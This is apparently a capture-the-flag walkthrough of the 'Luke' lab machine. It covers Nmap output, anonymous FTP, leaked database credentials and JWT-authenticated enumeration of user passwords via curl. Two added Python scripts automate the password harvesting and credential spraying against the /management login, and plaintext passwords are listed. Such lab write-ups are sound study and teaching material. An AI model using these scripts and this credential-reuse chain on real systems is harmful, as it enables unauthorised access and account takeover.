As usual, the first step is to run Nmap against the host to identify the services that are running:

```
Nmap scan report for 10.10.10.137
Host is up (0.042s latency).
Not shown: 65464 closed ports, 66 filtered ports
PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3+ (ext.1)
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_drwxr-xr-x    2 0        0             512 Apr 14 12:35 webapp
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to 10.10.13.75
|      Logged in as ftp
|      TYPE: ASCII
|      No session upload bandwidth limit
|      No session download bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 1
|      vsFTPd 3.0.3+ (ext.1) - secure, fast, stable
|_End of status
22/tcp   open  ssh?
80/tcp   open  http    Apache httpd 2.4.38 ((FreeBSD) PHP/7.3.3)
| http-methods: 
|_  Potentially risky methods: TRACE
|_http-server-header: Apache/2.4.38 (FreeBSD) PHP/7.3.3
|_http-title: Luke
3000/tcp open  http    Node.js Express framework
|_http-title: Site doesn't have a title (application/json; charset=utf-8).
8000/tcp open  http    Ajenti http control panel
|_http-title: Ajenti
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.70%E=4%D=8/13%OT=21%CT=1%CU=33830%PV=Y%DS=2%DC=T%G=Y%TM=5D52853
OS:5%P=x86_64-pc-linux-gnu)SEQ(SP=101%GCD=1%ISR=10D%TI=Z%CI=Z%II=RI%TS=21)O
OS:PS(O1=M54DNW6ST11%O2=M54DNW6ST11%O3=M54DNW6NNT11%O4=M54DNW6ST11%O5=M54DN
OS:W6ST11%O6=M54DST11)WIN(W1=FFFF%W2=FFFF%W3=FFFF%W4=FFFF%W5=FFFF%W6=FFFF)E
OS:CN(R=Y%DF=Y%T=40%W=FFFF%O=M54DNW6SLL%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F
OS:=AS%RD=0%Q=)T2(R=N)T3(R=Y%DF=Y%T=40%W=FFFF%S=O%A=S+%F=AS%O=M54DNW6ST11%R
OS:D=0%Q=)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%
OS:S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(
OS:R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0
OS:%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=S%T=40%CD=S)

Network Distance: 2 hops

TRACEROUTE (using port 587/tcp)
HOP RTT      ADDRESS
1   40.68 ms 10.10.12.1
2   40.94 ms 10.10.10.137

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 4814.02 seconds
```

From this output we can see that there are quite a few open ports. The first one I looked at was FTP, since it allows anonymous login.

```
root@kali:~/Documents/luke# ncftp 10.10.10.137
NcFTP 3.2.5 (Feb 02, 2011) by Mike Gleason (http://www.NcFTP.com/contact/).
Connecting to 10.10.10.137...
vsFTPd 3.0.3+ (ext.1) ready...
Logging in...
Login successful.
Logged in to 10.10.10.137.
ncftp / > ls
webapp/
ncftp / > cd webapp/
Directory successfully changed.
ncftp /webapp > ls
for_Chihiro.txt
ncftp /webapp > cat for_Chihiro.txt 
Dear Chihiro !!
As you told me that you wanted to learn Web Development and Frontend, I can give you a little push by showing the sources of the actual website I've created .
Normally you should know where to look but hurry up because I will delete them soon because of our security policies ! 
Derry  
ncftp /webapp >
```

As you can see, a single file is hosted on the FTP server: a txt file addressed to Chihiro. That appears to be everything available over FTP. Next I moved on to port 80 and browsed to 10.10.10.137 to see what was hosted there.

I was presented with a basic Bootstrap 4 page. Nothing was hidden in the source code and there were no links off the page. I then ran dirb to find other directories and files hosted on the server.

```
root@kali:~/Documents/luke# dirb http://10.10.10.137

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Aug 13 08:45:35 2019
URL_BASE: http://10.10.10.137/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt

-----------------

GENERATED WORDS: 4612

---- Scanning URL: http://10.10.10.137/ ----
==> DIRECTORY: http://10.10.10.137/css/
+ http://10.10.10.137/index.html (CODE:200|SIZE:3138)
==> DIRECTORY: http://10.10.10.137/js/
+ http://10.10.10.137/LICENSE (CODE:200|SIZE:1093)
+ http://10.10.10.137/management (CODE:401|SIZE:381)
==> DIRECTORY: http://10.10.10.137/member/
==> DIRECTORY: http://10.10.10.137/vendor/

---- Entering directory: http://10.10.10.137/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.137/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.137/member/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

---- Entering directory: http://10.10.10.137/vendor/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)

-----------------
END_TIME: Tue Aug 13 09:02:59 2019
DOWNLOADED: 4612 - FOUND: 3
```

A collection of directories was found. I also rescanned with DirBuster, which turned up /login.php and config.php; for some reason dirb had missed them.

Browsing to config.php returned the following:

```php
<?php
$dbHost = 'localhost';
$dbUsername = 'root';
$dbPassword = 'Zk6heYCyv6ZE9Xcg';
$db = "login";
$conn = new mysqli($dbHost, $dbUsername, $dbPassword, $db) or die("Connect failed: %s\n" . $conn->error);
```

So now we have a username and password: root:Zk6heYCyv6ZE9Xcg. /management was the other notable find. Browsing to it brings up an HTTP Basic authentication prompt. For the moment there did not appear to be anything else on port 80, so I moved on to port 3000.

Port 3000 appeared to be hosting a Node.js application. When you try to connect to it you receive a JSON response:

```json
{"success":false,"message":"Auth token is not supplied"}
```

I ran DirBuster against port 3000 to try to find other content.

```
DirBuster 1.0-RC1 - Report
http://www.owasp.org/index.php/Category:OWASP_DirBuster_Project
Report produced on Tue Aug 13 11:36:44 BST 2019
--------------------------------

http://10.10.10.137:3000
--------------------------------
Directories found during testing:

Dirs found with a 200 response:

/login/
/users/
/
/Login/
/users/admin/
/Users/
/Users/admin/
/users/Admin/
/Users/Admin/
/LogIn/
/LOGIN/

--------------------------------
```

All of these directories return a JSON response very similar to the original one, indicating that you need to authenticate. After some investigation I found that the application uses JSON Web Tokens (JWT): you send a request containing a valid username and password to the authentication endpoint, the server responds with a token, and that token is then presented to the application to authenticate. After a fair amount of trial and error I was able to obtain a token with the following request:

```
root@kali:/# curl -s -X POST -H 'Accept: application/json' -H 'Content-Type: application/json' --data '{"username":"admin","password":"Zk6heYCyv6ZE9Xcg","rememberMe":false}' http://10.10.10.137:3000/login
{"success":true,"message":"Authentication successful!","token":"eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM"}
root@kali:/#
```

As you can see, I used curl to send a POST request to http://10.10.10.137:3000/login. The POST body contains the username and password found on port 80. The server responds with a token. I then used curl to send that token back to the application in an Authorization header.

```
root@kali:/# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000
{"message":"Welcome admin ! "}
root@kali:/#
```

With the token supplied, the server responds with the message "Welcome admin !". I then sent the same token to the other directories DirBuster had found on port 3000.

```
root@kali:/# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users
[{"ID":"1","name":"Admin","Role":"Superuser"},{"ID":"2","name":"Derry","Role":"Web Admin"},{"ID":"3","name":"Yuri","Role":"Beta Tester"},{"ID":"4","name":"Dory","Role":"Supporter"}]
root@kali:/# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/admin
{"name":"Admin","password":"WX5b7)>/rp$U)FW"}
```

You can see that /users responds with a list of user names: Admin, Derry, Yuri and Dory. /users/admin responds with Admin's username and password: Admin:WX5b7)>/rp$U)FW. I then sent the token to /users/<name> for the remaining 3 users.

```
root@kali:~/Documents/luke# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/derry
{"name":"Derry","password":"rZ86wwLvx7jUxtch"}
root@kali:~/Documents/luke# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/yuri
{"name":"Yuri","password":"bet@tester87"}
root@kali:~/Documents/luke# curl -H 'Accept: application/json' -H "Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9.pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM" http://10.10.10.137:3000/users/dory
{"name":"Dory","password":"5y:!xa=ybfe)/QD"}
```
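The login-then-enumerate flow above, as an added Python example that is not part of the original write-up: it decodes the token the box handed back (without verifying the signature, which is all a client can do without the server's HS256 key, so the claims are for recon only) and wraps the /login and /users calls from the curl commands in reusable functions. The host, endpoint paths, JSON field names and the sample token are taken from the write-up; the function names and the decode-only helper are this example's own.

```python
"""Added example (not from the original write-up): JWT inspection and
authenticated enumeration of the Express API on 10.10.10.137:3000.
"""
import base64
import json
import urllib.request

BASE_URL = "http://10.10.10.137:3000"  # host and port from the write-up


def _b64url_decode(segment):
    # JWT segments are base64url without '=' padding; restore it before decoding.
    return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))


def decode_jwt_unverified(token):
    """Return the header and claims of a JWT WITHOUT checking the signature.

    Good enough to learn who the token is for and when it expires; it is
    NOT proof the token is genuine, only the server's HMAC key can give that.
    """
    header_b64, payload_b64, _signature_b64 = token.split(".")
    return {
        "header": json.loads(_b64url_decode(header_b64)),
        "claims": json.loads(_b64url_decode(payload_b64)),
    }


def token_lifetime_seconds(token):
    """exp - iat: how long the server lets one login be replayed."""
    claims = decode_jwt_unverified(token)["claims"]
    return int(claims["exp"]) - int(claims["iat"])


def user_detail_paths(users_listing):
    """Turn the /users listing into the per-user paths the write-up hits.

    Assumption (matches /users/admin, /users/derry, ... above): the detail
    path is the lowercase user name.
    """
    return ["/users/" + user["name"].lower() for user in users_listing]


def _request(method, path, body=None, token=None):
    data = json.dumps(body).encode() if body is not None else None
    req = urllib.request.Request(BASE_URL + path, data=data, method=method)
    req.add_header("Accept", "application/json")
    if body is not None:
        req.add_header("Content-Type", "application/json")
    if token:
        req.add_header("Authorization", "Bearer " + token)
    with urllib.request.urlopen(req, timeout=10) as resp:
        return json.loads(resp.read())


def login(username, password):
    """POST /login exactly as the curl command does; return the token string."""
    resp = _request("POST", "/login",
                    {"username": username, "password": password, "rememberMe": False})
    if not resp.get("success"):
        raise RuntimeError("login failed: %r" % resp)
    return resp["token"]


def harvest_credentials(token):
    """GET /users, then GET each /users/<name>; return {name: password}."""
    found = {}
    for path in user_detail_paths(_request("GET", "/users", token=token)):
        entry = _request("GET", path, token=token)
        found[entry["name"]] = entry["password"]
    return found


# The token the box returned in the write-up, reused here to exercise the decoder.
SAMPLE_TOKEN = ("eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
                "eyJ1c2VybmFtZSI6ImFkbWluIiwiaWF0IjoxNTY1Nzc5NTg4LCJleHAiOjE1NjU4NjU5ODh9."
                "pwVbukEZa90WsYzVOovh6GUer7wbHG1mNti9E9ajDJM")

if __name__ == "__main__":
    print(json.dumps(decode_jwt_unverified(SAMPLE_TOKEN), indent=2))
    print("token lifetime (s):", token_lifetime_seconds(SAMPLE_TOKEN))
    # Live run against the box (needs network access to 10.10.10.137):
    tok = login("admin", "Zk6heYCyv6ZE9Xcg")
    for name, pw in harvest_credentials(tok).items():
        print("%s:%s" % (name, pw))
```

Decoding the sample token shows `alg` is HS256 and the claims are `username`, `iat` and `exp` with a 24-hour lifetime, so a captured token stays usable for a full day; the enumeration itself only requires the Bearer header the write-up already demonstrates.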

So after all that, I have 5 sets of credentials:

  • Dory:5y:!xa=ybfe)/QD
  • Yuri:bet@tester87
  • Derry:rZ86wwLvx7jUxtch
  • Admin:WX5b7)>/rp$U)FW
  • root:Zk6heYCyv6ZE9Xcg

I went back to /management on port 80 and tried each set of credentials in turn. The Derry user was able to log in. From here we have a directory listing 3 different files: config.json, config.php and login.php. I opened config.json, which displayed the following:
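The "try each set of credentials in turn" step above, as an added Python example that is not part of the original write-up: it takes the credentials harvested from config.php and the port-3000 API and tests each one against the HTTP Basic realm on /management, reporting any that the server does not answer with 401. /management and the credentials come from the write-up; the injectable `fetch` argument (so the logic can be exercised without the box) and the assumption that the Basic-auth user name may be the lowercase form of the API name are this example's own.

```python
"""Added example (not from the original write-up): check harvested
credentials for reuse against the HTTP Basic auth realm on /management.
"""
import base64
import urllib.error
import urllib.request

MANAGEMENT_URL = "http://10.10.10.137/management"  # from the write-up

# Credentials collected from config.php and the /users/<name> endpoints.
HARVESTED = {
    "root": "Zk6heYCyv6ZE9Xcg",
    "Admin": "WX5b7)>/rp$U)FW",
    "Derry": "rZ86wwLvx7jUxtch",
    "Yuri": "bet@tester87",
    "Dory": "5y:!xa=ybfe)/QD",
}


def basic_auth_header(username, password):
    """RFC 7617 credential: 'Basic ' + base64(user ':' password)."""
    raw = ("%s:%s" % (username, password)).encode()
    return "Basic " + base64.b64encode(raw).decode()


def http_status(url, auth_header):
    """Fetch url with the given Authorization header; return the HTTP status."""
    req = urllib.request.Request(url, headers={"Authorization": auth_header})
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def candidate_usernames(name):
    # Assumption: the API reports 'Derry' but Apache users are often 'derry'.
    names = [name]
    if name.lower() != name:
        names.append(name.lower())
    return names


def find_reused_credentials(url, creds, fetch=http_status):
    """Return (username, password, status) for every pair the realm accepts.

    Anything other than 401 counts as accepted (200, or a redirect after
    login); `fetch` is injectable so the logic can be tested offline.
    """
    accepted = []
    for user, password in creds.items():
        for name in candidate_usernames(user):
            status = fetch(url, basic_auth_header(name, password))
            if status != 401:
                accepted.append((name, password, status))
    return accepted


if __name__ == "__main__":
    # Live run against the box (needs network access to 10.10.10.137):
    for name, password, status in find_reused_credentials(MANAGEMENT_URL, HARVESTED):
        print("%s:%s -> HTTP %d" % (name, password, status))
```

Five credentials times two name forms is ten requests, small enough that lockout is not a concern here; against a real target the same loop would need rate limiting and a check that the realm does not lock accounts.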

As you can see from that JSON output, we now have another root password. I then moved on to explore port 8000.

This is Ajenti, the software used to administer the server. I tried logging in with each of the 6 sets of credentials captured in the previous steps. The root login from config.json allowed me to log in to the panel.

From there a terminal session on the box can be spawned in the web browser. With access to that terminal I could cat both user.txt and root.txt to complete the machine.

# cd /root